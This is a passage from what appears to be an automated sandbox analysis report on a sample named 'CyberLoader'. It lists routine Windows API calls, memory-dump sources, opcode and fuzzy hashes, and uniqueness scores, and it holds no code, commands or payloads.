                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,002A1FA1,000000FF), ref: 0028A3D1
                                                  • OleUninitialize.OLE32(?,?,?,?,002A1FA1,000000FF), ref: 0028A3D6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: GdiplusShutdownUninitialize
                                                  • String ID:
                                                  • API String ID: 3856339756-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0027A189,?,002776B2,?,?,?,?), ref: 0027A1A5
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0027A189,?,002776B2,?,?,?,?), ref: 0027A1D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystem
                                                  • String ID:
                                                  • API String ID: 1175261203-0
                                                  • Opcode ID: 7324fb96a99a159380b8c825a12735b6135b1d6ae0235c6b4f74aeb0ab4bbde4
                                                  • Instruction ID: d643b7bb9620802ca6c6a534240399408fb3bf0041f07070cd11a848162c103a
                                                  • Opcode Fuzzy Hash: 7324fb96a99a159380b8c825a12735b6135b1d6ae0235c6b4f74aeb0ab4bbde4
                                                  • Instruction Fuzzy Hash: 76E0127691115C6BDB21AAA4AC09FE6776CEF09382F0400A5BA48D3154DA749A548FA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00289B30
                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00289B37
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: BitmapCreateFromGdipStream
                                                  • String ID:
                                                  • API String ID: 1918208029-0
                                                  • Opcode ID: 33a0a4a158b28d53e5c4ac82d0bf7a9d61174955a6c1dc35aea9ae128275659b
                                                  • Instruction ID: ef85525cda0d95fabb3a39754dc289e4e8aeba47851478ead9b6bbb5691fe045
                                                  • Opcode Fuzzy Hash: 33a0a4a158b28d53e5c4ac82d0bf7a9d61174955a6c1dc35aea9ae128275659b
                                                  • Instruction Fuzzy Hash: 74E06575422208EFCB10EF94D4016A9B7ECEB04310F14805BEC8493240D7B06E509F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0029329A: try_get_function.LIBVCRUNTIME ref: 002932AF
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0029217A
                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00292185
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                  • String ID:
                                                  • API String ID: 806969131-0
                                                  • Opcode ID: 09239c0a0209d362f1ead2ef9567d6684a91b2e03ffd246dba7b533b0d870cff
                                                  • Instruction ID: 3ec1c5598af1c2decb8318311546d83196daa5431e5639cb8777dcc126e49b1b
                                                  • Opcode Fuzzy Hash: 09239c0a0209d362f1ead2ef9567d6684a91b2e03ffd246dba7b533b0d870cff
                                                  • Instruction Fuzzy Hash: A3D0A928674302B4AC086BB0285A0A833485863BB03E00B86EA288A0D3EE10883D6912
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DloadLock.DELAYIMP ref: 0028DC73
                                                  • DloadProtectSection.DELAYIMP ref: 0028DC8F
                                                    • Part of subcall function 0028DE67: DloadObtainSection.DELAYIMP ref: 0028DE77
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Dload$Section$LockObtainProtect
                                                  • String ID:
                                                  • API String ID: 731663317-0
                                                  • Opcode ID: bb9cad7746dce7307669403d1e5a0297e9c873137106551cb40e76c94d6dbcce
                                                  • Instruction ID: 4a513911053fcf73337dc173333475c2c075267f1abcc69b6ce2de514833e068
                                                  • Opcode Fuzzy Hash: bb9cad7746dce7307669403d1e5a0297e9c873137106551cb40e76c94d6dbcce
                                                  • Instruction Fuzzy Hash: B5D0C97C9322115AC611BB14A9CA71C23B0B715745FA40603E105865F1DFE44CB8DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemShowWindow
                                                  • String ID:
                                                  • API String ID: 3351165006-0
                                                  • Opcode ID: d9a108886fd02a1f3e60c6b6124bc371edb6a78af38e0dc1fe829101db9b1c54
                                                  • Instruction ID: dc46570e48776b5e6ccb740a83db40dd63e82cac7bcfb3cb1dc69dd385aa1fd8
                                                  • Opcode Fuzzy Hash: d9a108886fd02a1f3e60c6b6124bc371edb6a78af38e0dc1fe829101db9b1c54
                                                  • Instruction Fuzzy Hash: 5BC01232858281FECB010BB0EC0DD2FBBA8ABA5212F05C90AB2A9C0061C238C818DB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 97239df2bfb97ef974969f592e1729a6cc30c162c9be9cd0d0cc1b0ac62a9c76
                                                  • Instruction ID: 2ef010ff7707608be5d262c8fb0d3289d47190aab2e251008213d69d186ba7ad
                                                  • Opcode Fuzzy Hash: 97239df2bfb97ef974969f592e1729a6cc30c162c9be9cd0d0cc1b0ac62a9c76
                                                  • Instruction Fuzzy Hash: BDC1A630A242559FDF15CF6CC485BA97BA5EF06314F0880BADC49DB286CB719D74CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 838a4e08c252f7d5554dacecc2924de7c5fc2fece02bb2ec941be0c6a9b819b7
                                                  • Instruction ID: 65dff94f4f035f6fbea7348cfe2fa3be03eef65584a6e41740074096cf66e01d
                                                  • Opcode Fuzzy Hash: 838a4e08c252f7d5554dacecc2924de7c5fc2fece02bb2ec941be0c6a9b819b7
                                                  • Instruction Fuzzy Hash: 8471CC71125F449EDB25DF30CC41AEBB7E9AF14301F44892EE5AE47282DB316A68EF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00278384
                                                    • Part of subcall function 00271380: __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00271380: new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 002719A6: __EH_prolog.LIBCMT ref: 002719AB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: bb7cbb22c6d490c891aca3c9640e76242b52ddf877dde7b6f5aabf6a82692ec6
                                                  • Instruction ID: d2bb0f8555b3db8c68ae8d3ce325ffc4b12f14f79fdb535963a5b886630b87a0
                                                  • Opcode Fuzzy Hash: bb7cbb22c6d490c891aca3c9640e76242b52ddf877dde7b6f5aabf6a82692ec6
                                                  • Instruction Fuzzy Hash: 0641B6718606559ADF20EB60CC55BEA73A8AF50300F0480EAE54EA3093DFB45EE8DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271E05
                                                    • Part of subcall function 00273B3D: __EH_prolog.LIBCMT ref: 00273B42
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: bb9a847837c1bdd87f7c455b0cfab83c3a163305d81e1b1af0c81fcd930ea2b7
                                                  • Instruction ID: c64740d7e4adb3fdbbe904527c71b82cf9bc279c712170b55ed270f648ed25bf
                                                  • Opcode Fuzzy Hash: bb9a847837c1bdd87f7c455b0cfab83c3a163305d81e1b1af0c81fcd930ea2b7
                                                  • Instruction Fuzzy Hash: B92139729251099FCF15EF99D9419EEBBF6BF58300B1040AEE849A7291CB325E30CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028A7C8
                                                    • Part of subcall function 00271380: __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00271380: new.LIBCMT ref: 002713FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 4f7a8b61c6d2aa9ad9d6f7ca09bf4994c84425bf4dac1a7581af476f970d6fbd
                                                  • Instruction ID: 420098dc7c3f1f8875910916d150b743659e13a1029238ba748e20169ee15a0c
                                                  • Opcode Fuzzy Hash: 4f7a8b61c6d2aa9ad9d6f7ca09bf4994c84425bf4dac1a7581af476f970d6fbd
                                                  • Instruction Fuzzy Hash: FF216B75C15249EACF14EF98C9429EEB7B4AF19300F0044AAE809A7242DB356E26DF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 4be9559173bd21dbfb0de3a74b52cfd4b31f172fbb47dbcee27d05ef839cb446
                                                  • Instruction ID: 83e5302644ef0174711409790344cf7eef36b2e55c9304daa322f93fb8724b96
                                                  • Opcode Fuzzy Hash: 4be9559173bd21dbfb0de3a74b52cfd4b31f172fbb47dbcee27d05ef839cb446
                                                  • Instruction Fuzzy Hash: 2B1182739206299BCB22AEA8CC419DEB735AF88750F018159F818B7251CA348D708BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                  • Instruction ID: 4b4d5cc4d79ea3f9c6579fc81ce2e6f8c0fbcb223377e34e0034fa4ddf100a3a
                                                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                  • Instruction Fuzzy Hash: 7EF03C319257069FDB30DE75C945A1AB7E8EB55330F20C91AE49EC6690EB70D8A0CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00275BDC
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0027968F,?,?,?,?,002A1FA1,000000FF), ref: 002796EB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A4F5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 002806B1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ExecutionStateThread
                                                  • String ID:
                                                  • API String ID: 2211380416-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GdipAlloc.GDIPLUS(00000010), ref: 00289D81
                                                    • Part of subcall function 00289B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00289B30
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                  • String ID:
                                                  • API String ID: 1915507550-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileType.KERNELBASE(000000FF,00279887), ref: 00279995
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
